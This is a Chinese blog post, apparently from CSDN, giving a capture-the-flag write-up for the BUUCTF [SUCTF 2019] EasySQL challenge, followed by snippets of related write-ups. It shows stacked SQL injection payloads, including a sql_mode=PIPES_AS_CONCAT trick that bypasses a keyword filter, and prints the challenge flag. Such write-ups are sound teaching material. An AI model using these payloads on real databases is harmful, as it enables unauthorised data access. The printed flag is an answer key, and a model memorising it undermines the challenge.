BUUCTF [web专项8] [SUCTF 2019]EasySQL

最新推荐文章于 2023-11-28 09:37:00 发布
最新推荐文章于 2023-11-28 09:37:00 发布
阅读量72 收藏
点赞数 1
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanglinchiji/article/details/134164480
版权

参考:sql注入 堆叠注入_pipes_as_concat_shu天的博客-CSDN博客

打开后发现有输入框

输入1发现正常回显,2,3等非0数字也回显1的结果

再输入字符或其他符号,发现不再回显

猜测是数字型,那就先爆库看看

1;show databases;#

爆一下表

1;show tables;#

发现有Flag出现

尝试查询Flag

1;select columns from Flag;#

猜测有过滤,但是不知道过滤的是什么,先猜测过滤了select,用handler试试

1;handler Flag open as a;handler a read next;#

发现依旧错误,猜测是flag被过滤

回想到最初输入非0数字会回显1的结果,猜测可能有||符号

使用sql_mode=PIPES_AS_CONCAT   来将||从or的含义转换成连接操作符,从而达到输出flag 的目的

1;set sql_mode=PIPES_AS_CONCAT;select 1

注意这里的1是可以替换的

另外不能闭合,否则不会输出后面的内容

(即select 1之后就不执行后面的内容,即flag的内容了)

出现flag

flag{a7f05ffa-04b5-4cc1-811c-15a1724e6079}

yanglin_371
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql_mode详解(超详细,亲测有效)
lky_for_lucky的博客
11-27 4万+
写在前面:处理MySQL数据库工作中遇到于sql_mode的情况,特学习记录一下 1.sql_mode sql_mode是一组语法校验规则 2.查询sql_mode ①命令:select @@GLOBAL.sql_mode或者select @@SESSION.sql_mode 例如:②查看my.conf配置文件 例如:3.设置sql_mode ①命令:SET GLOBAL sql_mode=‘mode’;或者SET SESSION sql_mode=‘mode’;(mode替换为实际配置)。 ②修改my.
BUUCTFEasySQL [SUCTF 2019]
金 帛的博客
04-18 2789
BUUCTF的WP
Buuctf web [SUCTF 2019]EasySQL
m0_61903191的博客
09-13 993
又是一道考察sql注入的题。
BUUCTF [SUCTF 2019] EasySQL
Senimo
03-30 2087
BUUCTF [SUCTF 2019] EasySQL Web writeup 启动靶机,打开页面: 根据题目判断是SQL注入,判断注入类型: 1;show databases; 最终判断为堆叠注入,查看当前表名: 1;show tables; 得到当前表名为Flag,多次注入无果,查看writeup存在源码泄露:index.php.swp,本环境无泄露 <?php se...
BUUCTF [SUCTF 2019]EasySQL
nareku的博客
07-09 631
输入1看看 常规试了试其他的数字发现都跟上面的一样的,试了1’ 和 1’‘都没有回显。输入 1 and 1=1等都是回显如下: 肯定是数字型注入,常规试试order by1-99试试,发现还是Nonono,那就是一个过滤了一些键字符。 试试堆叠注入 试试查询表中的字段: 1;select columns from ‘Flag’; 发现还是Nonono 其他的布尔注入,时间盲注也试过也是没啥用,应该是全部都过滤掉了那还是先猜解以下SQL语句吧(用burp可以知道*是没有被过滤的,这里就不演示了) 因
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF [SUCTF 2019]EasySQL1 writeup(详细版)
热门推荐
m0_62851980的博客
04-10 1万+
考点:堆叠注入,MySQL和mssql中||运算符的区别,运算符的意义转换(操作符重置) 打开靶机,尝试输入1查看回显: 可以看到表格回显了内容:1,用其他非0数字尝试全都回显1,那我们换个数字尝试,比如0: 什么都没有。 使用Sql堆叠注入查看信息,先用show指令查看数据库:1;show databases; 再查看一下表:1;show tables; 看到Flag表,猜测flag应该在Flag中。 但是直接select flag from Flag查询是查不...
BUUCTF[SUCTF 2019]EasySQL
楼阁de猫的博客
09-25 455
利用原理: (1)补充系统变量@@sql_modesql_mode:是一组mysql支持的基本语法及校验规则 PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似 猜测后台sql语句为: select 接受的变量 || flag form flag; payload: 1;set sql_mode=pipes_as_contact;select1; //闭合 //设置变量
BUUCTF——[SUCTF2019]EasySQL
weixin_62248541的博客
11-28 290
BUUCTF——[SUCTF2019]EasySQL
BUUCTF web-[SUCTF 2019]EasySQL
m0_53314778的博客
01-16 504
[SUCTF 2019]EasySQL 输入 show tables# 爆表我们发现了Flag表 1;show columns from Flag;# 查询Flag表的内容 不给我们查,应该是过滤了某些键字。 我再试了试order by 联合联合查询,依然是返回NO,没辙,学习开始: 这题键:要想办法让 ||不是逻辑或 解法一: 直接输入 **,1就可的flag 题解: 内置的sql语句为: sql=“select”.post[‘query’]."||flag from Flag"; 如果$post
[SUCTF 2019]EasySQL(set sql_mode=pipes_as_concat修改||)
weixin_45253573的博客
11-09 496
都被过滤,查看公开的源码 黑名单 : $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\""; 查询语句: select $_GET['query'] || flag from flag 两种方法 都是神乎其神的网友大佬想到的 1、...
BUUCTF--Web--[SUCTF 2019]EasySQL
weixin_44866139的博客
04-30 7675
猜测后端执行SQL语句 输入1,有回显 输入2,有回显,输入非零数字都有回显,输入字母无回显 输入1’,没回显,应该存在sql注入,猜测可能闭了错误回显,报错注入可能行不通了 用order去试探有多少个字段,返回的都是Nonono,可能order by 参数被过滤了,联合查询就行不通了 排除了报错注入和联合查询注入,试下盲注,布尔盲注 1 and length(database())>=...
BUUCTF-[SUCTF 2019]EasySQL1
Monica的博客
09-09 2336
题目: 分析: 先尝试输入。 输入非0数字的时候会有一个回显 输入大小写字母的时候没有回显 判断是什么闭合:输入1#能输出,而输入 1' 和1'#没有输出,"被过滤掉,大致上可以按照数字型进行猜测。 输入特殊字符也没有报错回显,所以报错注入基本上没戏了 输入很多于sql语句的东西(and,or,union,if,order from )都会显示Nonono,所以联合查询也没戏 再尝试时间盲注 ,sleep也被ban了,时间盲注也不行 再尝...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值